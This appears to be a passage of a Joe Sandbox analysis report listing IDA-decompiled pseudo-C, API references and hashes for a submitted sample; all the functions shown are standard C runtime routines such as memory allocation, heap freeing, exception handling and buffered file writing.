                        0x00000000
                        0x00000000
                        0x00406b6b
                        0x00406b7b
                        0x00000000

                        APIs
                        • _malloc.LIBCMT ref: 00406B70
                          • Part of subcall function 004078D7: __FF_MSGBANNER.LIBCMT ref: 004078FA
                          • Part of subcall function 004078D7: __NMSG_WRITE.LIBCMT ref: 00407901
                          • Part of subcall function 004078D7: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004104F5,00000001,00000001,00000001,?,0040DAD7,00000018,00417BD8,0000000C,0040DB68), ref: 0040794E
                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00406B93
                          • Part of subcall function 00406B3B: std::exception::exception.LIBCMT ref: 00406B47
                        • __CxxThrowException@8.LIBCMT ref: 00406BB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                        • String ID: TB$UX@
                        • API String ID: 3715980512-2156152108
                        • Opcode ID: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
                        • Instruction ID: e03a47e3d7dbfed10d582903bf367da44c0a492470d6b0e3d614105ffc528273
                        • Opcode Fuzzy Hash: f5f13009a3e2b1de24221d6bad4e3344780dabd098660a51c124c6ab0b4c5c10
                        • Instruction Fuzzy Hash: 5CF0E271A0412866DB187622DC06D5A3BB89B20318B51407FF813F10D2DF7DB952815D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E0040A2F1(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                        				signed int _v8;
                        				intOrPtr _t11;
                        				intOrPtr* _t15;
                        				intOrPtr* _t19;
                        				void* _t23;
                        
                        				_t25 = __edi;
                        				_t24 = __edx;
                        				_t11 =  *((intOrPtr*)( *_a4));
                        				if(_t11 == 0xe0434f4d) {
                        					__eflags =  *((intOrPtr*)(E00409F6C(_t23, __edx, __eflags) + 0x90));
                        					if(__eflags > 0) {
                        						_t15 = E00409F6C(_t23, __edx, __eflags) + 0x90;
                        						 *_t15 =  *_t15 - 1;
                        						__eflags =  *_t15;
                        					}
                        					goto L5;
                        				} else {
                        					_t32 = _t11 - 0xe06d7363;
                        					if(_t11 != 0xe06d7363) {
                        						L5:
                        						__eflags = 0;
                        						return 0;
                        					} else {
                        						 *(E00409F6C(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                        						_push(8);
                        						_push(0x417b18);
                        						E0040C128(_t23, __edi, __esi);
                        						_t19 =  *((intOrPtr*)(E00409F6C(_t23, __edx, _t32) + 0x78));
                        						if(_t19 != 0) {
                        							_v8 = _v8 & 0x00000000;
                        							 *_t19();
                        							_v8 = 0xfffffffe;
                        						}
                        						return E0040C16D(E0041069C(_t23, _t24, _t25));
                        					}
                        				}
                        			}








                        0x0040a2f1
                        0x0040a2f1
                        0x0040a2fb
                        0x0040a302
                        0x0040a321
                        0x0040a328
                        0x0040a32f
                        0x0040a334
                        0x0040a334
                        0x0040a334
                        0x00000000
                        0x0040a304
                        0x0040a304
                        0x0040a309
                        0x0040a336
                        0x0040a336
                        0x0040a339
                        0x0040a30b
                        0x0040a310
                        0x0040aefb
                        0x0040aefd
                        0x0040af02
                        0x0040af0c
                        0x0040af11
                        0x0040af13
                        0x0040af17
                        0x0040af22
                        0x0040af22
                        0x0040af33
                        0x0040af33
                        0x0040a309

                        APIs
                        • __getptd.LIBCMT ref: 0040A30B
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040A31C
                        • __getptd.LIBCMT ref: 0040A32A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __getptd$__amsg_exit__getptd_noexit
                        • String ID: MOC$csm
                        • API String ID: 803148776-1389381023
                        • Opcode ID: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
                        • Instruction ID: 622605f05806e43214a8a41ef03f34c1d013f3cc9fc1b6c3fd85fef28c091024
                        • Opcode Fuzzy Hash: afda627553e1d3404fb2c680ee2ca1c5e0fbcedafb92ff1583f665337c3a5b1c
                        • Instruction Fuzzy Hash: 11E09A36514304DFDB20AB75C04AB6A3698EB49318F1540B6A9C8D73A3D73CDCA4959B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E0040ECF3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t15;
                        				LONG* _t21;
                        				long _t23;
                        				void* _t31;
                        				LONG* _t33;
                        				void* _t34;
                        				void* _t35;
                        
                        				_t35 = __eflags;
                        				_t29 = __edx;
                        				_t25 = __ebx;
                        				_push(0xc);
                        				_push(0x417c18);
                        				E0040C128(__ebx, __edi, __esi);
                        				_t31 = E00409F6C(__ebx, __edx, _t35);
                        				_t15 =  *0x42d194; // 0xfffffffe
                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                        					E0040DB4D(_t25, _t31, 0xd);
                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                        					_t33 =  *(_t31 + 0x68);
                        					 *(_t34 - 0x1c) = _t33;
                        					__eflags = _t33 -  *0x42d098; // 0x21d15f8
                        					if(__eflags != 0) {
                        						__eflags = _t33;
                        						if(_t33 != 0) {
                        							_t23 = InterlockedDecrement(_t33);
                        							__eflags = _t23;
                        							if(_t23 == 0) {
                        								__eflags = _t33 - 0x42cc70;
                        								if(__eflags != 0) {
                        									_push(_t33);
                        									E004079A1(_t25, _t31, _t33, __eflags);
                        								}
                        							}
                        						}
                        						_t21 =  *0x42d098; // 0x21d15f8
                        						 *(_t31 + 0x68) = _t21;
                        						_t33 =  *0x42d098; // 0x21d15f8
                        						 *(_t34 - 0x1c) = _t33;
                        						InterlockedIncrement(_t33);
                        					}
                        					 *(_t34 - 4) = 0xfffffffe;
                        					E0040ED8E();
                        				} else {
                        					_t33 =  *(_t31 + 0x68);
                        				}
                        				if(_t33 == 0) {
                        					E0040CCA3(_t29, 0x20);
                        				}
                        				return E0040C16D(_t33);
                        			}










                        0x0040ecf3
                        0x0040ecf3
                        0x0040ecf3
                        0x0040ecf3
                        0x0040ecf5
                        0x0040ecfa
                        0x0040ed04
                        0x0040ed06
                        0x0040ed0e
                        0x0040ed2f
                        0x0040ed35
                        0x0040ed39
                        0x0040ed3c
                        0x0040ed3f
                        0x0040ed45
                        0x0040ed47
                        0x0040ed49
                        0x0040ed4c
                        0x0040ed52
                        0x0040ed54
                        0x0040ed56
                        0x0040ed5c
                        0x0040ed5e
                        0x0040ed5f
                        0x0040ed64
                        0x0040ed5c
                        0x0040ed54
                        0x0040ed65
                        0x0040ed6a
                        0x0040ed6d
                        0x0040ed73
                        0x0040ed77
                        0x0040ed77
                        0x0040ed7d
                        0x0040ed84
                        0x0040ed16
                        0x0040ed16
                        0x0040ed16
                        0x0040ed1b
                        0x0040ed1f
                        0x0040ed24
                        0x0040ed2c

                        APIs
                        • __getptd.LIBCMT ref: 0040ECFF
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __amsg_exit.LIBCMT ref: 0040ED1F
                        • __lock.LIBCMT ref: 0040ED2F
                        • InterlockedDecrement.KERNEL32(?), ref: 0040ED4C
                        • InterlockedIncrement.KERNEL32(021D15F8), ref: 0040ED77
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                        • String ID:
                        • API String ID: 4271482742-0
                        • Opcode ID: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
                        • Instruction ID: 298bf980c9c0aec7c7d52094cac1c499a146b192491b880d0050c6e3868dceb6
                        • Opcode Fuzzy Hash: f597ff586386ee98be70c95fc1552d6985489a0103feaeef2b68afe6ec2927bc
                        • Instruction Fuzzy Hash: 75018E31E00622D7D721AB26A84579A7360EF04B29F00053BE914773D1C73C68A28BCD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E004079A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t10;
                        				intOrPtr _t13;
                        				intOrPtr _t23;
                        				void* _t25;
                        
                        				_push(0xc);
                        				_push(0x417928);
                        				_t8 = E0040C128(__ebx, __edi, __esi);
                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                        				if(_t23 == 0) {
                        					L9:
                        					return E0040C16D(_t8);
                        				}
                        				if( *0x42f134 != 3) {
                        					_push(_t23);
                        					L7:
                        					if(HeapFree( *0x42eb04, 0, ??) == 0) {
                        						_t10 = E00407F57();
                        						 *_t10 = E00407F15(GetLastError());
                        					}
                        					goto L9;
                        				}
                        				E0040DB4D(__ebx, __edi, 4);
                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                        				_t13 = E0040DB80(_t23);
                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                        				if(_t13 != 0) {
                        					_push(_t23);
                        					_push(_t13);
                        					E0040DBB0();
                        				}
                        				 *(_t25 - 4) = 0xfffffffe;
                        				_t8 = E004079F7();
                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                        					goto L9;
                        				} else {
                        					_push( *((intOrPtr*)(_t25 + 8)));
                        					goto L7;
                        				}
                        			}







                        0x004079a1
                        0x004079a3
                        0x004079a8
                        0x004079ad
                        0x004079b2
                        0x00407a29
                        0x00407a2e
                        0x00407a2e
                        0x004079bb
                        0x00407a00
                        0x00407a01
                        0x00407a11
                        0x00407a13
                        0x00407a26
                        0x00407a28
                        0x00000000
                        0x00407a11
                        0x004079bf
                        0x004079c5
                        0x004079ca
                        0x004079d0
                        0x004079d5
                        0x004079d7
                        0x004079d8
                        0x004079d9
                        0x004079df
                        0x004079e0
                        0x004079e7
                        0x004079f0
                        0x00000000
                        0x004079f2
                        0x004079f2
                        0x00000000
                        0x004079f2

                        APIs
                        • __lock.LIBCMT ref: 004079BF
                          • Part of subcall function 0040DB4D: __mtinitlocknum.LIBCMT ref: 0040DB63
                          • Part of subcall function 0040DB4D: __amsg_exit.LIBCMT ref: 0040DB6F
                          • Part of subcall function 0040DB4D: EnterCriticalSection.KERNEL32(00409F0F,00409F0F,?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001), ref: 0040DB77
                        • ___sbh_find_block.LIBCMT ref: 004079CA
                        • ___sbh_free_block.LIBCMT ref: 004079D9
                        • HeapFree.KERNEL32(00000000,00000001,00417928,0000000C,0040DB2E,00000000,00417BD8,0000000C,0040DB68,00000001,00409F0F,?,0041588A,00000004,00417DC0,0000000C), ref: 00407A09
                        • GetLastError.KERNEL32(?,0041588A,00000004,00417DC0,0000000C,0041053F,00000001,00409F1E,00000000,00000000,00000000,?,00409F1E,00000001,00000214), ref: 00407A1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2714421763-0
                        • Opcode ID: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
                        • Instruction ID: 8f777d082abfc0d878f9bfaaf4c1826c71b29845cb59ede7f12ddd66b922c452
                        • Opcode Fuzzy Hash: c12663648c0d4e2af9016428884d4000b2d59aff5cd47b208b817aec9f7eb85a
                        • Instruction Fuzzy Hash: 89014471E092069AEF20BBB69C06B5F7A649F00764F50053FF504BA1D1CA7CBA458E5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 21%
                        			E0040A94F(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				void* __ebp;
                        				intOrPtr _t19;
                        				void* _t21;
                        				void* _t22;
                        				void* _t24;
                        				intOrPtr* _t25;
                        				void* _t26;
                        				void* _t27;
                        
                        				_t26 = __esi;
                        				_t25 = __edi;
                        				_t21 = __ebx;
                        				_t29 = _a20;
                        				if(_a20 != 0) {
                        					_push(_a20);
                        					_push(__ebx);
                        					_push(__esi);
                        					_push(_a4);
                        					E0040A8BD(__ebx, __edi, __esi, _t29);
                        					_t27 = _t27 + 0x10;
                        				}
                        				_t30 = _a28;
                        				_push(_a4);
                        				if(_a28 != 0) {
                        					_push(_a28);
                        				} else {
                        					_push(_t26);
                        				}
                        				E00406DBB(_t22);
                        				_push( *_t25);
                        				_push(_a16);
                        				_push(_a12);
                        				_push(_t26);
                        				E0040A33A(_t21, _t24, _t25, _t26, _t30);
                        				_push(0x100);
                        				_push(_a24);
                        				_t19 =  *((intOrPtr*)(_t25 + 4)) + 1;
                        				_push(_a16);
                        				 *((intOrPtr*)(_t26 + 8)) = _t19;
                        				_push(_a8);
                        				_push(_t26);
                        				_push(_a4);
                        				"j,hxzA"();
                        				if(_t19 != 0) {
                        					E00406D74(_t19, _t26);
                        					return _t19;
                        				}
                        				return _t19;
                        			}











                        0x0040a94f
                        0x0040a94f
                        0x0040a94f
                        0x0040a954
                        0x0040a958
                        0x0040a95a
                        0x0040a95d
                        0x0040a95e
                        0x0040a95f
                        0x0040a962
                        0x0040a967
                        0x0040a967
                        0x0040a96a
                        0x0040a96e
                        0x0040a971
                        0x0040a976
                        0x0040a973
                        0x0040a973
                        0x0040a973
                        0x0040a979
                        0x0040a97e
                        0x0040a980
                        0x0040a983
                        0x0040a986
                        0x0040a987
                        0x0040a98f
                        0x0040a994
                        0x0040a997
                        0x0040a998
                        0x0040a99b
                        0x0040a99e
                        0x0040a9a4
                        0x0040a9a5
                        0x0040a9a8
                        0x0040a9b2
                        0x0040a9b6
                        0x00000000
                        0x0040a9b6
                        0x0040a9bc

                        APIs
                        • ___BuildCatchObject.LIBCMT ref: 0040A962
                          • Part of subcall function 0040A8BD: ___BuildCatchObjectHelper.LIBCMT ref: 0040A8F3
                        • _UnwindNestedFrames.LIBCMT ref: 0040A979
                        • ___FrameUnwindToState.LIBCMT ref: 0040A987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                        • String ID: csm
                        • API String ID: 2163707966-1018135373
                        • Opcode ID: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
                        • Instruction ID: c18afe15dfa004b4b11c55b0fe6cb4d4148c85d4026d47cf0b1876583a05e907
                        • Opcode Fuzzy Hash: f7775c5282b144064f6aa1fbcbd92dd75a2391eadffbc48365066a24746a3b62
                        • Instruction Fuzzy Hash: 32012871100209BBDF126F52CC45EEE3E6AEF08394F058426BD09241A0D73A9972DBAA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 65%
                        			E004095AF() {
                        				signed long long _v12;
                        				signed int _v20;
                        				signed long long _v28;
                        				signed char _t8;
                        
                        				_t8 = GetModuleHandleA("KERNEL32");
                        				if(_t8 == 0) {
                        					L6:
                        					_v20 =  *0x4016f8;
                        					_v28 =  *0x4016f0;
                        					asm("fsubr qword [ebp-0x18]");
                        					_v12 = _v28 / _v20 * _v20;
                        					asm("fld1");
                        					asm("fcomp qword [ebp-0x8]");
                        					asm("fnstsw ax");
                        					if((_t8 & 0x00000005) != 0) {
                        						return 0;
                        					} else {
                        						return 1;
                        					}
                        				} else {
                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                        					if(__eax == 0) {
                        						goto L6;
                        					} else {
                        						_push(0);
                        						return __eax;
                        					}
                        				}
                        			}







                        0x004095b4
                        0x004095bc
                        0x004095d3
                        0x0040957f
                        0x00409588
                        0x00409594
                        0x00409597
                        0x0040959a
                        0x0040959c
                        0x0040959f
                        0x004095a4
                        0x004095ae
                        0x004095a6
                        0x004095aa
                        0x004095aa
                        0x004095be
                        0x004095c4
                        0x004095cc
                        0x00000000
                        0x004095ce
                        0x004095ce
                        0x004095d2
                        0x004095d2
                        0x004095cc

                        APIs
                        • GetModuleHandleA.KERNEL32(KERNEL32,004068AA), ref: 004095B4
                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004095C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsProcessorFeaturePresent$KERNEL32
                        • API String ID: 1646373207-3105848591
                        • Opcode ID: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
                        • Instruction ID: 420fee4b7b8c9d102a00ce1403d5f9c7b68c6b4b741a890553f7b07840975166
                        • Opcode Fuzzy Hash: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
                        • Instruction Fuzzy Hash: 01F09031A00A09E2DF012BA2BD0A36F7A79BB80746F9604B1E1D2F00E5CF3585B1824E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E0040C56B(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t59;
                        				intOrPtr* _t61;
                        				signed int _t63;
                        				void* _t68;
                        				signed int _t69;
                        				signed int _t72;
                        				signed int _t74;
                        				signed int _t75;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				signed int _t82;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t99;
                        				intOrPtr* _t100;
                        				void* _t101;
                        
                        				_t90 = __edx;
                        				if(_a8 == 0 || _a12 == 0) {
                        					L4:
                        					return 0;
                        				} else {
                        					_t100 = _a16;
                        					if(_t100 != 0) {
                        						_t82 = _a4;
                        						__eflags = _t82;
                        						if(_t82 == 0) {
                        							goto L3;
                        						}
                        						_t63 = _t59 | 0xffffffff;
                        						_t90 = _t63 % _a8;
                        						__eflags = _a12 - _t63 / _a8;
                        						if(_a12 > _t63 / _a8) {
                        							goto L3;
                        						}
                        						_t97 = _a8 * _a12;
                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                        						_v8 = _t82;
                        						_v16 = _t97;
                        						_t81 = _t97;
                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                        							_v12 = 0x1000;
                        						} else {
                        							_v12 =  *(_t100 + 0x18);
                        						}
                        						__eflags = _t97;
                        						if(_t97 == 0) {
                        							L32:
                        							return _a12;
                        						} else {
                        							do {
                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                        								__eflags = _t84;
                        								if(_t84 == 0) {
                        									L18:
                        									__eflags = _t81 - _v12;
                        									if(_t81 < _v12) {
                        										_t68 = E0040C407(_t97,  *_v8, _t100);
                        										__eflags = _t68 - 0xffffffff;
                        										if(_t68 == 0xffffffff) {
                        											L34:
                        											_t69 = _t97;
                        											L35:
                        											return (_t69 - _t81) / _a8;
                        										}
                        										_v8 = _v8 + 1;
                        										_t72 =  *(_t100 + 0x18);
                        										_t81 = _t81 - 1;
                        										_v12 = _t72;
                        										__eflags = _t72;
                        										if(_t72 <= 0) {
                        											_v12 = 1;
                        										}
                        										goto L31;
                        									}
                        									__eflags = _t84;
                        									if(_t84 == 0) {
                        										L21:
                        										__eflags = _v12;
                        										_t98 = _t81;
                        										if(_v12 != 0) {
                        											_t75 = _t81;
                        											_t90 = _t75 % _v12;
                        											_t98 = _t98 - _t75 % _v12;
                        											__eflags = _t98;
                        										}
                        										_push(_t98);
                        										_push(_v8);
                        										_push(E0040C0F3(_t100));
                        										_t74 = E00411BEA(_t81, _t90, _t98, _t100, __eflags);
                        										_t101 = _t101 + 0xc;
                        										__eflags = _t74 - 0xffffffff;
                        										if(_t74 == 0xffffffff) {
                        											L36:
                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                        											_t69 = _v16;
                        											goto L35;
                        										} else {
                        											_t88 = _t98;
                        											__eflags = _t74 - _t98;
                        											if(_t74 <= _t98) {
                        												_t88 = _t74;
                        											}
                        											_v8 = _v8 + _t88;
                        											_t81 = _t81 - _t88;
                        											__eflags = _t74 - _t98;
                        											if(_t74 < _t98) {
                        												goto L36;
                        											} else {
                        												L27:
                        												_t97 = _v16;
                        												goto L31;
                        											}
                        										}
                        									}
                        									_t77 = E0041098A(_t90, _t100);
                        									__eflags = _t77;
                        									if(_t77 != 0) {
                        										goto L34;
                        									}
                        									goto L21;
                        								}
                        								_t78 =  *(_t100 + 4);
                        								__eflags = _t78;
                        								if(__eflags == 0) {
                        									goto L18;
                        								}
                        								if(__eflags < 0) {
                        									_t48 = _t100 + 0xc;
                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                        									__eflags =  *_t48;
                        									goto L34;
                        								}
                        								_t99 = _t81;
                        								__eflags = _t81 - _t78;
                        								if(_t81 >= _t78) {
                        									_t99 = _t78;
                        								}
                        								E00407BB0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                        								 *_t100 =  *_t100 + _t99;
                        								_t101 = _t101 + 0xc;
                        								_t81 = _t81 - _t99;
                        								_v8 = _v8 + _t99;
                        								goto L27;
                        								L31:
                        								__eflags = _t81;
                        							} while (_t81 != 0);
                        							goto L32;
                        						}
                        					}
                        					L3:
                        					_t61 = E00407F57();
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					 *_t61 = 0x16;
                        					E00406D3E(_t90, 0, _t100);
                        					goto L4;
                        				}
                        			}





























                        0x0040c56b
                        0x0040c57b
                        0x0040c5a1
                        0x00000000
                        0x0040c582
                        0x0040c582
                        0x0040c587
                        0x0040c5a8
                        0x0040c5ab
                        0x0040c5ad
                        0x00000000
                        0x00000000
                        0x0040c5af
                        0x0040c5b4
                        0x0040c5b7
                        0x0040c5ba
                        0x00000000
                        0x00000000
                        0x0040c5bf
                        0x0040c5c3
                        0x0040c5ca
                        0x0040c5cd
                        0x0040c5d0
                        0x0040c5d2
                        0x0040c5dc
                        0x0040c5d4
                        0x0040c5d7
                        0x0040c5d7
                        0x0040c5e3
                        0x0040c5e5
                        0x0040c6aa
                        0x00000000
                        0x0040c5eb
                        0x0040c5eb
                        0x0040c5ee
                        0x0040c5ee
                        0x0040c5f4
                        0x0040c625
                        0x0040c625
                        0x0040c628
                        0x0040c681
                        0x0040c688
                        0x0040c68b
                        0x0040c6b6
                        0x0040c6b6
                        0x0040c6b8
                        0x00000000
                        0x0040c6bc
                        0x0040c68d
                        0x0040c690
                        0x0040c693
                        0x0040c694
                        0x0040c697
                        0x0040c699
                        0x0040c69b
                        0x0040c69b
                        0x00000000
                        0x0040c699
                        0x0040c62a
                        0x0040c62c
                        0x0040c639
                        0x0040c639
                        0x0040c63d
                        0x0040c63f
                        0x0040c643
                        0x0040c645
                        0x0040c648
                        0x0040c648
                        0x0040c648
                        0x0040c64a
                        0x0040c64b
                        0x0040c655
                        0x0040c656
                        0x0040c65b
                        0x0040c65e
                        0x0040c661
                        0x0040c6c4
                        0x0040c6c4
                        0x0040c6c8
                        0x00000000
                        0x0040c663
                        0x0040c663
                        0x0040c665
                        0x0040c667
                        0x0040c669
                        0x0040c669
                        0x0040c66b
                        0x0040c66e
                        0x0040c670
                        0x0040c672
                        0x00000000
                        0x0040c674
                        0x0040c674
                        0x0040c674
                        0x00000000
                        0x0040c674
                        0x0040c672
                        0x0040c661
                        0x0040c62f
                        0x0040c635
                        0x0040c637
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040c637
                        0x0040c5f6
                        0x0040c5f9
                        0x0040c5fb
                        0x00000000
                        0x00000000
                        0x0040c5fd
                        0x0040c6b2
                        0x0040c6b2
                        0x0040c6b2
                        0x00000000
                        0x0040c6b2
                        0x0040c603
                        0x0040c605
                        0x0040c607
                        0x0040c609
                        0x0040c609
                        0x0040c611
                        0x0040c616
                        0x0040c619
                        0x0040c61b
                        0x0040c61e
                        0x0040c620
                        0x00000000
                        0x0040c6a2
                        0x0040c6a2
                        0x0040c6a2
                        0x00000000
                        0x0040c5eb
                        0x0040c5e5
                        0x0040c589
                        0x0040c589
                        0x0040c58e
                        0x0040c58f
                        0x0040c590
                        0x0040c591
                        0x0040c592
                        0x0040c593
                        0x0040c599
                        0x00000000
                        0x0040c59e

                        APIs
                        • __flush.LIBCMT ref: 0040C62F
                        • __fileno.LIBCMT ref: 0040C64F
                        • __locking.LIBCMT ref: 0040C656
                        • __flsbuf.LIBCMT ref: 0040C681
                          • Part of subcall function 00407F57: __getptd_noexit.LIBCMT ref: 00407F57
                          • Part of subcall function 00406D3E: __decode_pointer.LIBCMT ref: 00406D49
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                        • String ID:
                        • API String ID: 3240763771-0
